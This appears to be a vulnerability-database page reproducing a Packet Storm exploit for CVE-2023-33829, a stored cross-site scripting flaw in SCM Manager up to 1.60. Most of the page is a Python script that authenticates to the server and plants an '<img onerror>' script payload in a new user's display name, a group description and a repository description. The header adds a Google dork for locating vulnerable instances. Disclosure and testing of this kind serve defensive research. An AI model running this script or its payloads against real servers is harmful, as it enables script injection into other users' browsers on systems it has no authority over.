Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormNeg0x, github.comPACKETSTORM:172588
HistoryMay 26, 2023 - 12:00 a.m.

SCM Manager 1.60 Cross Site Scripting

2023-05-2600:00:00
neg0x, github.com
packetstormsecurity.com
222
scm manager 1.60
cross-site scripting
authenticated
cve-2023-33829
stored
xss payload
vendor
software link
authentication
requests.

EPSS

0.002

Percentile

51.3%

JSON
`#!/usr/bin/python3  
  
# Exploit Title: SCM Manager 1.60 - Cross-Site Scripting Stored (Authenticated)  
# Google Dork: intitle:"SCM Manager" intext:1.60  
# Date: 05-25-2023  
# Exploit Author: neg0x (https://github.com/n3gox/CVE-2023-33829)  
# Vendor Homepage: https://scm-manager.org/  
# Software Link: https://scm-manager.org/docs/1.x/en/getting-started/  
# Version: 1.2 <= 1.60  
# Tested on: Debian based  
# CVE: CVE-2023-33829  
  
# Modules  
import requests  
import argparse  
import sys  
  
# Main menu  
parser = argparse.ArgumentParser(description='CVE-2023-33829 exploit')  
parser.add_argument("-u", "--user", help="Admin user or user with write permissions")  
parser.add_argument("-p", "--password", help="password of the user")  
args = parser.parse_args()  
  
  
# Credentials  
user = sys.argv[2]  
password = sys.argv[4]  
  
  
# Global Variables  
main_url = "http://localhost:8080/scm" # Change URL if its necessary  
auth_url = main_url + "/api/rest/authentication/login.json"  
users = main_url + "/api/rest/users.json"  
groups = main_url + "/api/rest/groups.json"  
repos = main_url + "/api/rest/repositories.json"  
  
# Create a session  
session = requests.Session()  
  
# Credentials to send  
post_data={  
'username': user, # change if you have any other user with write permissions  
'password': password # change if you have any other user with write permissions  
}  
  
r = session.post(auth_url, data=post_data)  
  
if r.status_code == 200:  
print("[+] Authentication successfully")  
else:  
print("[-] Failed to authenticate")  
sys.exit(1)  
  
new_user={  
  
"name": "newUser",  
"displayName": "<img src=x onerror=alert('XSS')>",  
"mail": "",  
"password": "",  
"admin": False,  
"active": True,  
"type": "xml"  
  
}  
  
create_user = session.post(users, json=new_user)  
print("[+] User with XSS Payload created")  
  
new_group={  
  
"name": "newGroup",  
"description": "<img src=x onerror=alert('XSS')>",  
"type": "xml"  
  
}  
  
create_group = session.post(groups, json=new_group)  
print("[+] Group with XSS Payload created")  
  
new_repo={  
  
"name": "newRepo",  
"type": "svn",  
"contact": "",  
"description": "<img src=x onerror=alert('XSS')>",  
"public": False  
  
}  
  
create_repo = session.post(repos, json=new_repo)  
print("[+] Repository with XSS Payload created")  
  
  
`

Related

githubexploit 2
cvelist 1
cve 1
prion 1
nvd 1
zdt 1
exploitdb 1
githubexploit
githubexploit
Exploit for Cross-site Scripting in Cloudogu Scm Manager
2023-05-19 13:11:50
Exploit for Cross-site Scripting in Cloudogu Scm Manager
2023-05-19 13:11:50
cvelist
cvelist
CVE-2023-33829
2023-05-24 00:00:00
cve
cve
CVE-2023-33829
2023-05-24 21:15:11
prion
prion
Cross site scripting
2023-05-24 21:15:00
nvd
nvd
CVE-2023-33829
2023-05-24 21:15:11
zdt
zdt
SCM Manager 1.60 - Cross-Site Scripting Stored (Authenticated) Exploit
2023-05-26 00:00:00
exploitdb
exploitdb
SCM Manager 1.60 - Cross-Site Scripting Stored (Authenticated)
2023-05-25 00:00:00

EPSS

0.002

Percentile

51.3%

JSON
Related for PACKETSTORM:172588
githubexploit2cvelist1cve1prion1nvd1zdt1exploitdb1